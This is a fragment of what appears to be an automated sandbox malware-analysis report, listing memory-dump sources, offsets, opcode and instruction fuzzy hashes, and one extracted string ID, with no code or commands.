                                                                                • Source File: 0000000E.00000002.2697187461.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff848f00000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b7fefc3256585bc70116ec30b170703a5728c885ce6f888a394ac768ca061d2f
                                                                                • Instruction ID: e8343bc2c8ea3649d740fad832de42c712d4f51d893744204458934ae225a2d7
                                                                                • Opcode Fuzzy Hash: b7fefc3256585bc70116ec30b170703a5728c885ce6f888a394ac768ca061d2f
                                                                                • Instruction Fuzzy Hash: 79218C30B1DA490FE788EF2C945A378B2D2EF99356F4505BEE00EC3293DE689C418745
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2697187461.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ff848f00000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 10812d024b0b2b79bb3608237e23d009818edd88ed180aaa8088673e02fbadd6
                                                                                • Instruction ID: dac8bb5912c932760a3cf80c50624c7f3e89de7f68cd204273e744a712538748
                                                                                • Opcode Fuzzy Hash: 10812d024b0b2b79bb3608237e23d009818edd88ed180aaa8088673e02fbadd6
                                                                                • Instruction Fuzzy Hash: 2D215020B2A90A9FFB44BB7C545A3BD72D2FF98645F500176E40DD32C2EE2C58424355
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.2924844678.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_7ff848f30000_X1.jbxd
                                                                                Similarity
                                                                                • String ID: CAM_^$SAM_^
                                                                                • API String ID: 0-1151103998
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%
